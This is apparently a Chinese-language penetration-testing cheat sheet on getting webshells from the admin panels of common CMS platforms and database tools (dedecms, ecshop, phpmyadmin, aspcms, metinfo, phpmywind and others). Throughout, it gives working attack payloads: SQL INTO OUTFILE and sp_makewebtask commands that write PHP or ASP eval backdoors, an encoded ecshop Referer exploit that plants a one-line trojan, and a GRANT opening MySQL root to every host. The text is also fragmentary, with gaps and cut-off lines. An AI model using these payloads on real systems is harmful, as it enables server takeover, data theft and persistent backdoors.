文章来源:安全鸭 一、方法分类 1.带有漏洞的应用 1.数据库备份拿shell 如果网站后台具有数据库备份功能,可以将webshell格式先修改为允许上传的文件格式如jpg,gif等。然后找到上传后的文件路径,通过数据库备份,将文件备份为脚本格式。
3.修改允许上传类型 进入网站后台后找到上传点发现对上传有白名单限制,正好又可以添加白名单,可以将脚本格式写入白名单然后进行上传。如果容器允许的情况下,尝试上传与网站源码不同类型的脚本格式拿shell 4.服务器解析漏洞 IIS 5.x/6.0解析漏洞 IIS 7.0/IIS 7.5/ Nginx Apache解析漏洞 5.编辑器
http://192.168.1.10:8009//inc/config.asp 7.上传插件 8.数据库执行 sqlserver 导出 ;exec%20sp_makewebtask%20%20%27c:\inetpub\wwwroot\ms\x1.asp%27,%27select%27%27<%execut mysql导出 Create TABLE study (cmd text NOT NULL);Insert INTO study (cmd) VALUES('<?php eval ($_POST[cmd]) ?>');select cmd from study into outfile 'D:/php/www/htdocs/test/seven.php';Drop TABLE IF EXISTS study; 版本二 use mysql;create table x(packet text) type=MYISaM;insert into x (packet) values('<pre><body ><?php @system($_GET['cmd']); ?></body></pre>')select x into outfile 'd:\php\xx.php' 版本三 select '<?php eval($_POST[cmd]);?>' into outfile 'C:/Inetpub/wwwroot/mysql-php/1.php' 9.文件包含 <!--#include file='123.jpg'-->#调用的文件必须和被调用文件在同一目录,如果不在同一目录,用下面的语句:<!--#include virtual='文件所在目录/123.jpg'--> php包含
10. 命令执行
三、常见cms后台拿shell1.dedecmsdedecms版本:http://192.168.1.10:8030/data/admin/ver.txt
一、后台文件上传 写马 连接 如果目标“文件式管理器”接口被阉割,也许只是单纯的在前端删除了入口。可以修改js调用: media_main.php?dopost=filemanager#找到任意按钮修改js代码如图,即可再次调用文件管理 如果权限被限制无法上传到upload以外的目录。通过修改名称跨越目录,绕过权限封锁 二、数据库执行拿shell sql命令行工具》写shell #需要得到网站的物理路径select '<?php @eval($_POST[x]);?>' into outfile 'C:\\inetpub\\getshell\\DedecmsV53-UTF8-Final\\DedecmsV53-UTF8-Final\\x.php'#dede暴路径方法payload:http:///plus/feedback.php?aid=1&dsql=xxx 写shell 连接 2.南方数据、良精、动易一、数据库备份(备份图片马、备份数据库) manage_backup.asp 1.上传图片马 2.审查元素,找到图片马路径 3.开始备份 注意点: 二、配置插马 三、修改上传类型突破上传 四、双文件突破上传 五、修改editor/admin_style.asp 3.ecshop1.sql语句写shell #报错获取网站物理路径use mysql;#写shellselect '<?php phpinfo();?>' into outfile 'C:\\inetpub\\getshell\\8103-ECShop\\ECShop_2.7.4_UTF8_beta1\\upload\\x.php' 2.修改文件 连接:http://192.168.1.10:8103/myship.php 3.前台getshell http://192.168.1.10:8103/user.php》刷新抓包》发送repeater: exp:Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:'num';s:280:'*/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -';s:2:'id';s:3:''/*';} 会在网站根目录下生成1.php一句话木马,密码1337 3.5wordpress上传插件
4.phpmyadmin写shell #写shell语句select '<?php eval($_POST[cmd]);?>' into outfile 'D:\SOFT\webbuild\php\WWW\aa.php' 寻找网站根目录 select @@basedir; 2.根据mysql安装路径推理出apache配置文件(记录了网站根目录)
3.使用某个数据库,创建一个表用来读取apache的配置文件 use mysql;create table xx(xx text);load data infile 'D:\SOFT\webbuild\php\Apache/conf/https.conf' into table xx;select * from xx;# 在搜索结果里面检索关键词documentroot找到网站根目录 如果有waf会拦截不让导shell #开外链。将mysql root放在所有地址上并设置密码Grant all privileges on *.* to 'root'@'%' identified by '123.com' with grant option;#公网地址链接目标mysql服务器mysql.exe -h 200.1.1.1 -uroot -p 3.通过远程地址链接mysql服务器导入一句话 备份路径:genaeral log file:D:\SOFT\webbuild\php\MySQL\data\DESKTOP-CCDQEGR.log 执行:select “<?php phpinfo();?>” 写入成功:http://localhost/xxx.php #命令行操作:set global general_log=on;set global general_log_file='shell路径';#还原set global general_log=off;set global general_log_file='D:\SOFT\webbuild\php\MySQL\data\DESKTOP-CCDQEGR.log'; 5.kesion cms科迅cms需要使用ie低版本浏览器 这里会回显文件名不合法。但是实际上已经上传成功(新版本失败) 6.aspcms1.插件管理,界面风格修改asp文件 2.扩展功能,数据库备份 3.配置插马 #插马路径./config/aspcms_config.asp#语句%><%Eval(Request(chr(112)))%><% 7.SD cms
连接: 3.内容,专题,添加专题
添加专题1 添加专题2 扩展设置,专题模板。value值设置为: ../../../../html/special/test000/index 提交,提交完成后会在根目录生成0.php后门文件 9.metinfo select '<?php @eval($_POST[cmd]);>' into oufile 'c:/inetpub/wwwroot/8121/xx.php'; 《重新压缩》删除之前备份文件》上传修改之后的数据库备份文件》导入:执行sql语句》生成shell 192.168.1.10:8095/admin/column/save.php?name=123&action=editor&foldername=upload&module=22;@eval($_POST[cmd]);/* 在upload目录下生成index.php的一句话: 10.discuz 2.帝国备份王getshell 12.phpmywind1.网站信息设置》附件设置,添加允许上传类型getshell 》提交》基本设置:1;@eval($_POST[a]) 》提交>连接:http://192.168.1.10:8112/admin/default.php 13.phpweb1.前台直接上传 2.后台编辑器 连接: http://192.168.1.12/phpweb/3151/product/pics/20200628/202006281593274850595.php |
|